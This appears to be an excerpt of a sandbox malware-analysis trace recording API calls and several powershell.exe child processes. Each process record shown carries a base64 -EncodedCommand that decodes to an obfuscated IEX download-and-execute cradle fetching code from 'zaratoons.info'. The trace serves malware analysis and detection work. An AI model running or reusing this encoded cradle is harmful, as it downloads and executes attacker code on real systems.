	[0974.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.047] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0975.049] CoCreateGuid (in: pguid=0x18db10 | out: pguid=0x18db10*(Data1=0xc4bf5ab4, Data2=0x6897, Data3=0x49d3, Data4=([0]=0x80, [1]=0x99, [2]=0xb7, [3]=0x98, [4]=0x33, [5]=0xef, [6]=0x2e, [7]=0xb2))) returned 0x0
	[0975.164] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.164] CoTaskMemFree (pv=0x40bd00) 
	[0975.189] WinSqmIsOptedIn () returned 0x0
	[0975.189] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.189] CoTaskMemFree (pv=0x40bd00) 
	[0975.190] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.190] CoTaskMemFree (pv=0x40bd00) 
	[0975.191] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.191] CoTaskMemFree (pv=0x40bd00) 
	[0975.191] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.192] CoTaskMemFree (pv=0x40bd00) 
	[0975.192] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.192] CoTaskMemFree (pv=0x40bd00) 
	[0975.193] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.193] CoTaskMemFree (pv=0x40bd00) 
	[0975.194] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.194] CoTaskMemFree (pv=0x40bd00) 
	[0975.194] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.195] CoTaskMemFree (pv=0x40bd00) 
	[0975.199] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.199] CoTaskMemFree (pv=0x40bd00) 
	[0975.205] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.205] CoTaskMemFree (pv=0x40bd00) 
	[0975.205] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.205] CoTaskMemFree (pv=0x40bd00) 
	[0975.205] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0975.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.205] CoTaskMemFree (pv=0x40bd00) 

Thread:
	id = 1362
	os_tid = 0x1ef8


Thread:
	id = 1384
	os_tid = 0x1f70


Thread:
	id = 1664
	os_tid = 0x22cc


Thread:
	id = 1666
	os_tid = 0x22e4


Thread:
	id = 1668
	os_tid = 0x22f4


Thread:
	id = 1722
	os_tid = 0x1f78


Thread:
	id = 1723
	os_tid = 0x1f74

	[0825.231] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1734
	os_tid = 0x1fac


Thread:
	id = 2148
	os_tid = 0x24c4


Process:
	id = "192"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x51886000"
	os_pid = "0x1454"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "48"
	os_parent_pid = "0xe18"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1132
	os_tid = 0x1030

	[0601.339] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1249
	os_tid = 0x1c24


Thread:
	id = 1267
	os_tid = 0x1c98


Thread:
	id = 1898
	os_tid = 0x2578


Thread:
	id = 1907
	os_tid = 0x25a8


Thread:
	id = 1960
	os_tid = 0x2688


Thread:
	id = 2068
	os_tid = 0x1fec


Process:
	id = "193"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5422e000"
	os_pid = "0x1a34"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1135
	os_tid = 0x1268

	[0700.333] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1417
	os_tid = 0x1610


Thread:
	id = 1454
	os_tid = 0x1d9c


Thread:
	id = 2049
	os_tid = 0x27f4


Thread:
	id = 2051
	os_tid = 0x27fc


Thread:
	id = 2054
	os_tid = 0x1a80


Thread:
	id = 2091
	os_tid = 0x1838


Process:
	id = "194"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x52f74000"
	os_pid = "0x101c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "36"
	os_parent_pid = "0x9bc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1136
	os_tid = 0x35c

	[0602.767] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1244
	os_tid = 0x8d4


Thread:
	id = 1261
	os_tid = 0x1c78


Thread:
	id = 1953
	os_tid = 0x2650


Thread:
	id = 1962
	os_tid = 0x2690


Thread:
	id = 1970
	os_tid = 0x26b0


Thread:
	id = 2071
	os_tid = 0x1f50


Process:
	id = "195"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4a743000"
	os_pid = "0x19e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1144
	os_tid = 0x3a8

	[0580.819] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1246
	os_tid = 0x14c4


Thread:
	id = 1265
	os_tid = 0x1c90


Thread:
	id = 1815
	os_tid = 0x213c


Thread:
	id = 1825
	os_tid = 0x1ddc


Thread:
	id = 1840
	os_tid = 0x2444


Thread:
	id = 1990
	os_tid = 0x2700


Process:
	id = "196"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x49ef7000"
	os_pid = "0x1680"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1158
	os_tid = 0x1b9c

	[0694.259] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1374
	os_tid = 0x1f40


Thread:
	id = 1393
	os_tid = 0x1fa4


Process:
	id = "197"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x49e6e000"
	os_pid = "0x1b6c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1160
	os_tid = 0x1b24

	[0695.434] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1398
	os_tid = 0x1fb8


Thread:
	id = 1428
	os_tid = 0xbb4


Thread:
	id = 2109
	os_tid = 0x15ac


Thread:
	id = 2111
	os_tid = 0x2304


Thread:
	id = 2112
	os_tid = 0xfc4


Process:
	id = "198"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6a09f000"
	os_pid = "0x1098"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1171
	os_tid = 0x17d0

	[0693.720] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1373
	os_tid = 0x1f3c


Thread:
	id = 1392
	os_tid = 0x1fa0


Process:
	id = "199"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x62628000"
	os_pid = "0x1788"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "28"
	os_parent_pid = "0x204"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1174
	os_tid = 0x139c

	[0638.399] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1360
	os_tid = 0x1ee8


Thread:
	id = 1380
	os_tid = 0x1f60


Thread:
	id = 1748
	os_tid = 0x1ffc


Thread:
	id = 1756
	os_tid = 0x1610


Thread:
	id = 1794
	os_tid = 0x1d80


Thread:
	id = 1891
	os_tid = 0x2550


Process:
	id = "200"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5b495000"
	os_pid = "0x4bc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1176
	os_tid = 0x854

	[0694.539] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1397
	os_tid = 0x1fb4


Thread:
	id = 1433
	os_tid = 0x10d4


Thread:
	id = 1791
	os_tid = 0x1be0


Thread:
	id = 1797
	os_tid = 0x1128


Thread:
	id = 1811
	os_tid = 0x20d4


Thread:
	id = 1935
	os_tid = 0x2620


Process:
	id = "201"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x37436000"
	os_pid = "0x1888"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "42"
	os_parent_pid = "0xcd4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
